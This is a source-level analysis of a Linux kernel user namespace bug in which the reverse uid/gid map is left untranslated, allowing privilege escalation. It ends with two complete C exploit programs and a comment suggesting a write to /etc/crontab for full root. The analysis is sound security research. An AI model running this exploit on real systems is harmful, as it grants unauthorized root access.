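Introduction
This is a vulnerability in Linux user namespaces. The article first covers the basics of user namespaces, then starts from the patch and reads through the source to find the root cause. Because I am not very familiar with this part of the kernel, the write-up concentrates on the source analysis; for everything else, see the links at the end.
All code in this article is based on linux-4.15.4.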
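Namespaces
Linux implements namespaces to isolate different kinds of resources. The underlying idea is to move what used to be global variables into per-namespace structures.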
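User namespaces
The man page for user namespaces on Linux: overview of Linux user namespaces
User namespaces isolate security-related identifiers and attributes, mainly UIDs, GIDs, the root directory, keys, and capabilities. With a user namespace, a process can have different UIDs and GIDs inside and outside the namespace; for example, it can be root inside the namespace while being unprivileged on the real system.
The man page above describes two proc files, /proc/<pid>/uid_map and /proc/<pid>/gid_map. Writing to them maps UIDs or GIDs of the system into the namespace. Each line has three fields:
- The first field, ID-inside-ns, is the UID or GID as seen inside the container.
- The second field, ID-outside-ns, is the real UID or GID outside the container that it maps to.
- The third field is the length of the mapped range; a value of 1 maps a single ID one-to-one.
For example, mapping the real uid=1000 to uid=0 inside the container: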
$ cat /proc/2465/uid_map
0 1000 1
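- The process writing these files needs the CAP_SETUID (CAP_SETGID) capability in that namespace (see Capabilities).
- The writing process must be in either this user namespace or its parent user namespace.
- In addition, one of the following must hold: 1) the data maps the writer's effective uid/gid in the parent namespace into the child's user namespace, or 2) the writer has CAP_SETUID/CAP_SETGID in the parent namespace, in which case it can map any uid/gid of the parent namespace.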
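The three-field line format can be illustrated with a small userspace sketch. This is not kernel code: the struct and the function names `demo_parse_line` and `demo_inside_to_outside` are hypothetical and exist only for this example, which assumes a single extent.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical userspace mirror of one uid_map line; not a kernel type. */
struct demo_extent {
    uint32_t inside;   /* ID-inside-ns */
    uint32_t outside;  /* ID-outside-ns */
    uint32_t count;    /* length of the mapped range */
};

/* Parse "inside outside count"; returns 0 on success, -1 on malformed input. */
int demo_parse_line(const char *line, struct demo_extent *out)
{
    unsigned long a, b, c;

    if (sscanf(line, "%lu %lu %lu", &a, &b, &c) != 3)
        return -1;
    out->inside = (uint32_t)a;
    out->outside = (uint32_t)b;
    out->count = (uint32_t)c;
    return 0;
}

/* Translate an ID seen inside the namespace to the ID outside it.
 * Returns (uint32_t)-1 when the ID is not covered by the extent. */
uint32_t demo_inside_to_outside(const struct demo_extent *e, uint32_t id)
{
    if (id < e->inside || id - e->inside >= e->count)
        return (uint32_t)-1;
    return e->outside + (id - e->inside);
}
```

With the line `0 1000 1` from the example above, uid 0 inside the namespace translates to uid 1000 outside, and every other uid is unmapped.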
Patch analysis
The fix for this vulnerability is here; the problem is in map_write in kernel/user_namespace.c:
diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c
index e5222b5..923414a 100644
--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf,
     if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
         goto out;
 
-    ret = sort_idmaps(&new_map);
-    if (ret < 0)
-        goto out;
-
     ret = -EPERM;
     /* Map the lower ids from the parent user namespace to the
      * kernel global id space.
@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf,
         e->lower_first = lower_first;
     }
 
+    /*
+     * If we want to use binary search for lookup, this clones the extent
+     * array and sorts both copies.
+     */
+    ret = sort_idmaps(&new_map);
+    if (ret < 0)
+        goto out;
+
     /* Install the map */
     if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
         memcpy(map->extent, new_map.extent,
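The patch only moves a few lines. Before drawing conclusions, let's analyze the function.
The call graph for this function, generated with Understand:
Next, look at proc_uid_map_write, which calls map_write. Its prototype: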
ssize_t proc_uid_map_write(struct file *file, const char __user *buf, size_t size, loff_t *ppos)
The parameters look like those of a file write handler. Searching the source for uses of this function turns up the following structure in fs/proc/base.c:
static const struct file_operations proc_uid_map_operations = {
    .open    = proc_uid_map_open,
    .write   = proc_uid_map_write,
    .read    = seq_read,
    .llseek  = seq_lseek,
    .release = proc_id_map_release,
};
So it is indeed a file operation. The same file also contains:
REG("uid_map", S_IRUGO|S_IWUSR, proc_uid_map_operations)
So this is presumably the implementation of writes to /proc/<pid>/uid_map.
Source code analysis
Back to the vulnerable code. We start with proc_uid_map_write, the first function on the write path:
ssize_t proc_uid_map_write(struct file *file, const char __user *buf,
                           size_t size, loff_t *ppos)
{
    struct seq_file *seq = file->private_data;
    struct user_namespace *ns = seq->private;
    struct user_namespace *seq_ns = seq_user_ns(seq);

    if (!ns->parent)
        return -EPERM;

    if ((seq_ns != ns) && (seq_ns != ns->parent))
        return -EPERM;

    return map_write(file, buf, size, ppos, CAP_SETUID,
                     &ns->uid_map, &ns->parent->uid_map);
}
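It performs only two checks and then calls map_write. The last two arguments are the uid_map of the namespace and the uid_map of its parent namespace (recall that a new namespace is created by cloning a new process with specific flags, so it always has a parent).
Now look at the definitions of these maps. The layout of uid_gid_extent matches the line format of /proc/<pid>/uid_map and its siblings. The user_namespaces man page also says that several lines can be written at once: in Linux 4.14 and earlier the limit was (arbitrarily) set to 5 lines, and since Linux 4.15 it is 340 lines. That makes the two structures below easy to understand: with up to 5 lines the extents are stored directly in extent, and with more than 5 they are stored in the array that forward points to: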
#define UID_GID_MAP_MAX_BASE_EXTENTS 5
#define UID_GID_MAP_MAX_EXTENTS 340
struct uid_gid_extent {
    u32 first;
    u32 lower_first;
    u32 count;
};

struct uid_gid_map { /* 64 bytes -- 1 cache line */
    u32 nr_extents;
    union {
        struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS];
        struct {
            struct uid_gid_extent *forward;
            struct uid_gid_extent *reverse;
        };
    };
};
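The first part of map_write is now fairly easy to follow. The capability checks match the description in the man page. Apart from some argument validation, the important piece is kbuf: memdup_user_nul allocates kernel memory and copies the data written by user space into it, and kbuf points at that buffer.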
    struct seq_file *seq = file->private_data;
    struct user_namespace *ns = seq->private;
    struct uid_gid_map new_map;
    unsigned idx;
    struct uid_gid_extent extent;
    char *kbuf = NULL, *pos, *next_line;
    ssize_t ret = -EINVAL;

    memset(&new_map, 0, sizeof(struct uid_gid_map));

    ret = -EPERM;
    /* Only allow one successful write to the map */
    if (map->nr_extents != 0)
        goto out;

    /*
     * Adjusting namespace settings requires capabilities on the target.
     */
    if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN))
        goto out;

    /* Only allow < page size writes at the beginning of the file */
    ret = -EINVAL;
    if ((*ppos != 0) || (count >= PAGE_SIZE))
        goto out;

    /* Slurp in the user data */
    // copy the data written from user space into kbuf
    kbuf = memdup_user_nul(buf, count);
    if (IS_ERR(kbuf)) {
        ret = PTR_ERR(kbuf);
        kbuf = NULL;
        goto out;
    }

    /* Parse the user data */
    ret = -EINVAL;
    pos = kbuf;
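Next comes a large loop that parses the user input line by line into extent and then calls two key functions, mappings_overlap and insert_extent. mappings_overlap checks whether a uid_gid_extent overlaps anything already in the uid_gid_map and returns true if it does; insert_extent appends a uid_gid_extent to the uid_gid_map.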
    for (; pos; pos = next_line) {

        /* Find the end of line and ensure I don't look past it */
        next_line = strchr(pos, '\n');
        if (next_line) {
            *next_line = '\0';
            next_line++;
            if (*next_line == '\0')
                next_line = NULL;
        }

        pos = skip_spaces(pos);
        extent.first = simple_strtoul(pos, &pos, 10);
        if (!isspace(*pos))
            goto out;

        pos = skip_spaces(pos);
        extent.lower_first = simple_strtoul(pos, &pos, 10);
        if (!isspace(*pos))
            goto out;

        pos = skip_spaces(pos);
        extent.count = simple_strtoul(pos, &pos, 10);
        if (*pos && !isspace(*pos))
            goto out;

        /* Verify there is not trailing junk on the line */
        pos = skip_spaces(pos);
        if (*pos != '\0')
            goto out;

        /* Verify we have been given valid starting values */
        if ((extent.first == (u32) -1) ||
            (extent.lower_first == (u32) -1))
            goto out;

        /* Verify count is not zero and does not cause the
         * extent to wrap
         */
        if ((extent.first + extent.count) <= extent.first)
            goto out;
        if ((extent.lower_first + extent.count) <=
             extent.lower_first)
            goto out;

        /* Do the ranges in extent overlap any previous extents? */
        if (mappings_overlap(&new_map, &extent))
            goto out;

        if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS &&
            (next_line != NULL))
            goto out;

        ret = insert_extent(&new_map, &extent);
        if (ret < 0)
            goto out;
        ret = -EINVAL;
    }
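The two "does not wrap" tests in the loop rely on unsigned 32-bit arithmetic wrapping modulo 2^32. A minimal userspace sketch of that check follows; the function name `demo_range_ok` is hypothetical and the code only models the validation of a single start/count pair.

```c
#include <stdbool.h>
#include <stdint.h>

/* Models the sanity checks applied to one (start, count) pair:
 * the start must not be (u32)-1, and start + count must be strictly
 * greater than start, which rejects both count == 0 and 32-bit wrap. */
bool demo_range_ok(uint32_t first, uint32_t count)
{
    if (first == UINT32_MAX)
        return false;
    /* Unsigned addition wraps modulo 2^32, so an overflowing sum
     * ends up less than or equal to first. */
    if ((uint32_t)(first + count) <= first)
        return false;
    return true;
}
```

A count of zero leaves the sum equal to the start, and a range that runs past 2^32 - 1 wraps to a smaller value, so a single comparison covers both cases.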
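Now the implementation of these two functions. mappings_overlap walks the uid_gid_map, takes each uid_gid_extent, and compares it against extent, checking both the upper (in-namespace) range and the lower range. Note that once nr_extents exceeds 5, the entries are read from the array that forward points to.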
static bool mappings_overlap(struct uid_gid_map *new_map,
                             struct uid_gid_extent *extent)
{
    u32 upper_first, lower_first, upper_last, lower_last;
    unsigned idx;

    upper_first = extent->first;
    lower_first = extent->lower_first;
    upper_last = upper_first + extent->count - 1;
    lower_last = lower_first + extent->count - 1;

    for (idx = 0; idx < new_map->nr_extents; idx++) {
        u32 prev_upper_first, prev_lower_first;
        u32 prev_upper_last, prev_lower_last;
        struct uid_gid_extent *prev;

        if (new_map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
            prev = &new_map->extent[idx];
        else
            prev = &new_map->forward[idx];

        prev_upper_first = prev->first;
        prev_lower_first = prev->lower_first;
        prev_upper_last = prev_upper_first + prev->count - 1;
        prev_lower_last = prev_lower_first + prev->count - 1;

        /* Does the upper range intersect a previous extent? */
        if ((prev_upper_first <= upper_last) &&
            (prev_upper_last >= upper_first))
            return true;

        /* Does the lower range intersect a previous extent? */
        if ((prev_lower_first <= lower_last) &&
            (prev_lower_last >= lower_first))
            return true;
    }
    return false;
}
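Both comparisons in mappings_overlap are the standard intersection test for closed intervals. The sketch below isolates that test in userspace; `struct demo_range` and `demo_ranges_intersect` are hypothetical names used only for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Closed interval [first, last] of IDs. */
struct demo_range {
    uint32_t first;
    uint32_t last;
};

/* Two closed intervals intersect exactly when each one starts
 * no later than the other one ends. */
bool demo_ranges_intersect(struct demo_range a, struct demo_range b)
{
    return a.first <= b.last && a.last >= b.first;
}
```

The kernel function applies this test twice per stored extent, once to the in-namespace range and once to the lower range, and rejects the new extent if either intersects.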
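Now insert_extent. It is built around one large if: when nr_extents reaches 5, meaning the inline array is full, it allocates memory for 340 extents, copies the existing entries over, and makes the array behind forward the destination for subsequent inserts. Finally nr_extents is incremented.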
static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent)
{
    struct uid_gid_extent *dest;

    if (map->nr_extents == UID_GID_MAP_MAX_BASE_EXTENTS) {
        struct uid_gid_extent *forward;

        /* Allocate memory for 340 mappings. */
        forward = kmalloc(sizeof(struct uid_gid_extent) *
                          UID_GID_MAP_MAX_EXTENTS, GFP_KERNEL);
        if (!forward)
            return -ENOMEM;

        /* Copy over memory. Only set up memory for the forward pointer.
         * Defer the memory setup for the reverse pointer.
         */
        memcpy(forward, map->extent,
               map->nr_extents * sizeof(map->extent[0]));

        map->forward = forward;
        map->reverse = NULL;
    }

    if (map->nr_extents < UID_GID_MAP_MAX_BASE_EXTENTS)
        dest = &map->extent[map->nr_extents];
    else
        dest = &map->forward[map->nr_extents];

    *dest = *extent;
    map->nr_extents++;
    return 0;
}
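Back in map_write. Everything so far copies the input and validates it, and the parsed result now sits in new_map. We skip new_idmap_permitted, which can be understood from the capabilities section of the user_namespaces man page. The next call is sort_idmaps: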
    if (new_map.nr_extents == 0)
        goto out;

    ret = -EPERM;
    /* Validate the user is allowed to use user id's mapped to. */
    if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
        goto out;

    ret = sort_idmaps(&new_map);
    if (ret < 0)
        goto out;
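sort_idmaps is a sorting function that only does work when there are more than 5 extents. It also uses kmemdup to make a copy, sorts that copy in reverse-lookup order, and stores it in reverse, which insert_extent above initialized to NULL.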
static int sort_idmaps(struct uid_gid_map *map)
{
    if (map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
        return 0;

    /* Sort forward array. */
    sort(map->forward, map->nr_extents, sizeof(struct uid_gid_extent),
         cmp_extents_forward, NULL);

    /* Only copy the memory from forward we actually need. */
    map->reverse = kmemdup(map->forward,
                           map->nr_extents * sizeof(struct uid_gid_extent),
                           GFP_KERNEL);
    if (!map->reverse)
        return -ENOMEM;

    /* Sort reverse array. */
    sort(map->reverse, map->nr_extents, sizeof(struct uid_gid_extent),
         cmp_extents_reverse, NULL);

    return 0;
}
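The clone-and-sort pattern can be reproduced in userspace with qsort. This is only a sketch under the assumption that the standard library's qsort, malloc, and memcpy stand in for the kernel's sort and kmemdup; `struct demo_extent` and `demo_sort_both` are hypothetical names.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct demo_extent {
    uint32_t first;
    uint32_t lower_first;
    uint32_t count;
};

/* Order by the in-namespace start, as the forward array is. */
static int demo_cmp_first(const void *a, const void *b)
{
    const struct demo_extent *e1 = a, *e2 = b;

    return (e1->first > e2->first) - (e1->first < e2->first);
}

/* Order by the lower start, as the reverse array is. */
static int demo_cmp_lower(const void *a, const void *b)
{
    const struct demo_extent *e1 = a, *e2 = b;

    return (e1->lower_first > e2->lower_first) -
           (e1->lower_first < e2->lower_first);
}

/* Sorts fwd in place by first and returns a heap copy sorted by
 * lower_first, or NULL on allocation failure. The caller frees it. */
struct demo_extent *demo_sort_both(struct demo_extent *fwd, size_t n)
{
    struct demo_extent *rev;

    qsort(fwd, n, sizeof(*fwd), demo_cmp_first);
    rev = malloc(n * sizeof(*rev));
    if (!rev)
        return NULL;
    memcpy(rev, fwd, n * sizeof(*rev));
    qsort(rev, n, sizeof(*rev), demo_cmp_lower);
    return rev;
}
```

The important property is that the copy is a snapshot: anything written to the forward array after this point is not reflected in the second array.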
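map_write then iterates over the input and calls map_id_range_down. Its first argument is the parent namespace's uid_gid_map that was passed to map_write; the second and third arguments are the second and third fields of each input line, that is, the start and the length of the range in the parent namespace that is being mapped.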
    /* Map the lower ids from the parent user namespace to the
     * kernel global id space.
     */
    for (idx = 0; idx < new_map.nr_extents; idx++) {
        struct uid_gid_extent *e;
        u32 lower_first;

        if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
            e = &new_map.extent[idx];
        else
            e = &new_map.forward[idx];

        lower_first = map_id_range_down(parent_map,
                                        e->lower_first,
                                        e->count);

        /* Fail if we can not map the specified extent to
         * the kernel global id space.
         */
        if (lower_first == (u32) -1)
            goto out;

        e->lower_first = lower_first;
    }
Now map_id_range_down:
static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count)
{
    struct uid_gid_extent *extent;
    unsigned extents = map->nr_extents;
    smp_rmb();

    if (extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
        extent = map_id_range_down_base(extents, map, id, count);
    else
        extent = map_id_range_down_max(extents, map, id, count);

    /* Map the id or note failure */
    if (extent)
        id = (id - extent->first) + extent->lower_first;
    else
        id = (u32) -1;

    return id;
}
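When the parent map holds more than 5 extents, this calls map_id_range_down_max, a thin wrapper around binary search. Recall that the second field of the user input is the start of the range in the parent namespace. The function binary-searches the parent's map for a uid_gid_extent whose [first, first+count-1] contains the range the child namespace wants to map.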
/**
 * map_id_range_down_max - Find idmap via binary search in ordered idmap array.
 * Can only be called if number of mappings exceeds UID_GID_MAP_MAX_BASE_EXTENTS.
 */
static struct uid_gid_extent *
map_id_range_down_max(unsigned extents, struct uid_gid_map *map, u32 id, u32 count)
{
    struct idmap_key key;

    key.map_up = false;
    key.count = count;
    key.id = id;

    return bsearch(&key, map->forward, extents,
                   sizeof(struct uid_gid_extent), cmp_map_id);
}
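Back in map_id_range_down: once the uid_gid_extent is found, it is used to update id, which is then returned. Looking back at the caller, id is the lower_first field of the child's uid_gid_extent, the start of the range in the parent namespace. The statement below rewrites id into the ID space that the parent's map points to. Because every namespace is nested, step by step, under a single root namespace, and each map was translated the same way when it was written, the resulting value is the uid in the system as a whole.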
id = (id - extent->first) + extent->lower_first;
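The lookup and the translation can be combined into a small userspace sketch. The comparator here is a simplified stand-in for the kernel's cmp_map_id, which the article does not show, so treat `demo_cmp`, `struct demo_key`, and `demo_map_range_down` as assumptions made for illustration. The array must already be sorted by `first`, and the requested range is assumed not to wrap.

```c
#include <stdint.h>
#include <stdlib.h>

struct demo_extent {
    uint32_t first;
    uint32_t lower_first;
    uint32_t count;
};

struct demo_key {
    uint32_t id;
    uint32_t count;
};

/* bsearch comparator: 0 when [id, id+count-1] lies entirely inside
 * the extent's [first, first+count-1]; otherwise steer left or right. */
static int demo_cmp(const void *k, const void *e)
{
    const struct demo_key *key = k;
    const struct demo_extent *el = e;
    uint32_t id_last = key->id + key->count - 1;
    uint32_t last = el->first + el->count - 1;

    if (key->id >= el->first && id_last <= last)
        return 0;
    if (key->id < el->first)
        return -1;
    return 1;
}

/* Translate the start of a range through a sorted map.
 * Returns (uint32_t)-1 when no single extent contains the range. */
uint32_t demo_map_range_down(const struct demo_extent *sorted, size_t n,
                             uint32_t id, uint32_t count)
{
    struct demo_key key = { id, count };
    const struct demo_extent *hit;

    hit = bsearch(&key, sorted, n, sizeof(*sorted), demo_cmp);
    if (!hit)
        return (uint32_t)-1;
    /* Same arithmetic as the kernel statement above. */
    return (id - hit->first) + hit->lower_first;
}
```

For a parent extent `1000 200000 1000`, asking for id 1500 with count 10 yields 200500: the offset of 500 into the extent is preserved and rebased onto lower_first. A range that straddles two extents is not contained in either and is rejected.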
Finally, back in map_write, the end of the for loop stores the result in the lower_first field of the corresponding uid_gid_extent in new_map:
e->lower_first = lower_first;
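The last part of map_write is essentially a write-back. map_write receives a parameter map, which proc_uid_map_write shows to be the current namespace's uid_gid_map, while new_map is freshly built. This part installs new_map into map (the proc file can be written only once and starts out empty). Error handling follows.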
    /* Install the map */
    if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
        memcpy(map->extent, new_map.extent,
               new_map.nr_extents * sizeof(new_map.extent[0]));
    } else {
        map->forward = new_map.forward;
        map->reverse = new_map.reverse;
    }
    smp_wmb();
    map->nr_extents = new_map.nr_extents;

    *ppos = count;
    ret = count;
out:
    if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) {
        kfree(new_map.forward);
        kfree(new_map.reverse);
        map->forward = NULL;
        map->reverse = NULL;
        map->nr_extents = 0;
    }

    mutex_unlock(&userns_state_mutex);
    kfree(kbuf);
    return ret;
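Vulnerability analysis
In sort_idmaps above, when there are more than 5 entries a copy is created in reverse and sorted. In the unpatched code nothing modifies that copy afterwards, and its address is finally assigned to map.
Compare the two sort orders: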
static int cmp_extents_forward(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->first < e2->first)
        return -1;

    if (e1->first > e2->first)
        return 1;

    return 0;
}

/* cmp function to sort() reverse mappings */
static int cmp_extents_reverse(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->lower_first < e2->lower_first)
        return -1;

    if (e1->lower_first > e2->lower_first)
        return 1;

    return 0;
}
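forward is sorted by the first field of each uid_gid_extent in the uid_gid_map, while reverse is sorted by the lower_first field.
The for loop that calls map_id_range_down updates e->lower_first, and e is taken from forward. So only the entries in forward are updated; the entries in reverse are left alone and still hold the values supplied by the user. Suppose a namespace n1 maps its root to an unprivileged uid in the kernel, and n1 then creates a namespace n2 that maps n1's root to n2's root. In n2's uid_map, the second field of the extents behind forward has been translated, but the extents behind reverse have not and still describe a root-to-root mapping. Any uid decision made through reverse therefore results in privilege escalation.
The next question is where the reverse array is actually used, and what for.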
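The effect of the ordering can be simulated in userspace. The sketch below is a model and not kernel code: it assumes a parent map with a single extent `0 100000 1000`, uses the six identity extents from the nested-namespace scenario, and the names `demo_install`, `demo_translate`, and `demo_make_reverse` are hypothetical.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define DEMO_N 6

struct demo_extent {
    uint32_t first;
    uint32_t lower_first;
    uint32_t count;
};

static int demo_cmp_lower(const void *a, const void *b)
{
    const struct demo_extent *e1 = a, *e2 = b;

    return (e1->lower_first > e2->lower_first) -
           (e1->lower_first < e2->lower_first);
}

/* Rebase every lower_first through one assumed parent extent. */
static void demo_translate(struct demo_extent *fwd, size_t n,
                           const struct demo_extent *parent)
{
    size_t i;

    for (i = 0; i < n; i++)
        fwd[i].lower_first =
            (fwd[i].lower_first - parent->first) + parent->lower_first;
}

/* Snapshot fwd into rev and sort the snapshot by lower_first. */
static void demo_make_reverse(const struct demo_extent *fwd,
                              struct demo_extent *rev, size_t n)
{
    memcpy(rev, fwd, n * sizeof(*rev));
    qsort(rev, n, sizeof(*rev), demo_cmp_lower);
}

/* fixed == 0 models the pre-patch order (snapshot, then translate);
 * fixed != 0 models the patched order (translate, then snapshot).
 * Returns the lower_first of the first reverse entry. */
uint32_t demo_install(int fixed)
{
    const struct demo_extent parent = { 0, 100000, 1000 };
    struct demo_extent fwd[DEMO_N] = {
        {0, 0, 1}, {1, 1, 1}, {2, 2, 1}, {3, 3, 1}, {4, 4, 1}, {5, 5, 995}
    };
    struct demo_extent rev[DEMO_N];

    if (!fixed) {
        demo_make_reverse(fwd, rev, DEMO_N);
        demo_translate(fwd, DEMO_N, &parent);
    } else {
        demo_translate(fwd, DEMO_N, &parent);
        demo_make_reverse(fwd, rev, DEMO_N);
    }
    return rev[0].lower_first;
}
```

In the pre-patch order the snapshot still claims that namespace uid 0 corresponds to kernel uid 0, while in the patched order it corresponds to 100000, which matches what the forward array says.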
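According to the author of the report, and following the references to reverse in the user namespace code, the array is used by from_kuid(), which kuid_has_mapping() calls to decide whether a kuid is mapped; kuid_has_mapping() is in turn used by permission checks such as inode_owner_or_capable() and privileged_wrt_inode_uidgid(). In other words, the kernel needs reverse when it determines the actual privileges of a process. Consider a process in a container accessing a file: the kernel must decide whether the process has permission, and when the file belongs to the namespace it has to look at the process's privileges inside the container, so it maps the kernel uid (kuid) back to the uid inside the namespace.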
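The reverse direction can be sketched the same way. The code below is a simplified userspace model of a "kernel ID to namespace ID" lookup and of a has-mapping check built on it; it uses a linear scan instead of binary search, and `demo_map_up` and `demo_has_mapping` are hypothetical names, not the kernel's functions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct demo_extent {
    uint32_t first;
    uint32_t lower_first;
    uint32_t count;
};

/* Map a kernel-global ID back to the ID inside the namespace.
 * Returns (uint32_t)-1 when no extent covers the kernel ID. */
uint32_t demo_map_up(const struct demo_extent *map, size_t n, uint32_t kid)
{
    size_t i;

    for (i = 0; i < n; i++) {
        const struct demo_extent *e = &map[i];

        if (kid >= e->lower_first && kid - e->lower_first < e->count)
            return e->first + (kid - e->lower_first);
    }
    return (uint32_t)-1;
}

/* A kernel ID "has a mapping" when the reverse lookup succeeds. */
bool demo_has_mapping(const struct demo_extent *map, size_t n, uint32_t kid)
{
    return demo_map_up(map, n, kid) != (uint32_t)-1;
}
```

With an untranslated extent `0 0 1000`, kernel uid 0 appears to be mapped into the namespace; with the translated extent `0 100000 1000` it does not, and only kernel uids 100000 to 100999 are considered mapped.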
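Exploit code
Finally, the exploit code. The first part is subuid_shell.c, which uses a plain unshare call to create a new namespace. The flow is:
1. The parent forks a child and waits; the child calls unshare to create a new user namespace.
2. The child then waits while the parent writes uid_map and the related files (through newuidmap and newgidmap) to set up the mapping.
3. The parent waits; the child sets its uid and gid to 0 and executes bash.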
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");

    if (child == 0) {
        // kill child if parent dies
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        close(sync_pipe[1]);

        // create new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // set uid and gid to 0, in child ns
        if (setgid(0))
            err(1, "setgid");
        if (setuid(0))
            err(1, "setuid");

        // replace process with bash shell, in which you will see "root",
        // as the setuid(0) call worked
        // this might seem a little confusing, but you are "root" only to this child ns,
        // thus, no permission to the outside ns
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // set id mapping (0..1000) for child process
    char cmd[1000];
    sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child);
    if (system(cmd))
        errx(1, "denying setgroups failed");
    sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newuidmap failed");
    sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newgidmap failed");

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}
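Next is subshell.c. The flow is the same as above; only the mapping data written by the parent differs. Why these particular values are used is explained in the vulnerability analysis above.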
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    // create a child process
    pid_t child = fork();
    if (child == -1)
        err(1, "fork");

    if (child == 0) {
        // in child process
        close(sync_pipe[1]);

        // this creates a new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // start a bash process (replace process image)
        // this time you are actually root, without the name/id, though
        // technically the root access is not complete,
        // to get complete root, write to /etc/crontab and wait for a root shell to pop up
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    char pbuf[100]; // path of the child's /proc directory
    sprintf(pbuf, "/proc/%d", (int)child);

    // cd to /proc/<pid>
    if (chdir(pbuf))
        err(1, "chdir");

    // our new id mapping with 6 extents (> 5 extents)
    const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";

    // write the new mapping to uid_map and gid_map
    int uid_map = open("uid_map", O_WRONLY);
    if (uid_map == -1)
        err(1, "open uid map");
    if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write uid map");
    close(uid_map);

    int gid_map = open("gid_map", O_WRONLY);
    if (gid_map == -1)
        err(1, "open gid map");
    if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write gid map");
    close(gid_map);

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}